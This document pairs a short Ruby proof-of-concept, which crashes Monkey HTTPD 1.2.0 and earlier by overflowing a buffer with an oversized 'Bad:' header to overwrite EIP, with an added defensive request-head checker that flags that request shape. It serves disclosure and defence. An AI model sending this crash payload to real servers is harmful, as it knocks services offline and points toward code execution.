```ruby
#!/usr/bin/env ruby
#
# Demonstrates a buffer overflow in Monkey HTTPD <= 1.2.0
#
# The '\r\n' after the Host header seems to be necessary, as well as the
# 'localhost\r\n' after it. On my system, the offset of 2511 overwrites eip
# perfectly with 'BBBB'. I wasn't able to exploit this further, but it might
# be possible.
require 'socket'

host = 'localhost'
port = 2001

s = TCPSocket.open(host, port)

# Build the request: an empty Host header, a bare 'localhost' line, then a
# 'Bad:' header whose value overruns the server-side buffer.
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511
buf << "B" * 4
buf << "\r\n\r\n\r\n"

s.puts(buf)
s.close
```
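The crash above is triggered by a request head that a front-end check can reject before it reaches the server: an empty Host value, a header line with no colon, and a header value of several kilobytes. The following is an added example, not part of the original paste, of a request-head sanity check of the kind a reverse proxy or WAF would apply; the 1024-byte value limit and the constructed sample requests are assumptions.

```ruby
# Added example (not from the original paste): a request-head sanity check
# that flags the request shape the PoC relies on. The value-length limit is
# an assumed setting; tune it to what the application actually needs.
MAX_HEADER_VALUE = 1024  # assumed limit; the paste's header is ~2.5 KB

# Parse the request head (everything before the first blank line) into the
# request line plus an array of [name, value] header pairs. A line without a
# colon yields a nil value so the caller can report it as malformed.
def parse_request_head(raw)
  head = raw.split("\r\n\r\n", 2).first.to_s
  lines = head.split("\r\n")
  request_line = lines.shift.to_s
  headers = lines.map do |line|
    name, value = line.split(":", 2)
    [name.to_s.strip, value && value.strip]
  end
  [request_line, headers]
end

# Return the list of findings for a raw request; empty means it passed.
def inspect_request(raw, max_value: MAX_HEADER_VALUE)
  request_line, headers = parse_request_head(raw)
  findings = []
  unless request_line =~ %r{\A[A-Z]+ \S+ HTTP/1\.[01]\z}
    findings << "malformed request line: #{request_line.inspect}"
  end
  headers.each do |name, value|
    if value.nil?
      findings << "header line without a colon: #{name[0, 20].inspect}"
    elsif value.empty?
      findings << "empty value for header #{name}"
    elsif value.length > max_value
      findings << "oversized header #{name}: #{value.length} bytes (limit #{max_value})"
    end
  end
  findings
end

# Constructed samples: a benign request and one with the PoC's shape
# (empty Host, a stray bare line, then an over-long header value).
BENIGN = "GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
OVERSIZED = "GET / HTTP/1.1\r\nHost: \r\nlocalhost\r\nBad: " + ("A" * 3000) + "\r\n\r\n"

if __FILE__ == $0
  p inspect_request(BENIGN)     # []
  p inspect_request(OVERSIZED)  # three findings
end
```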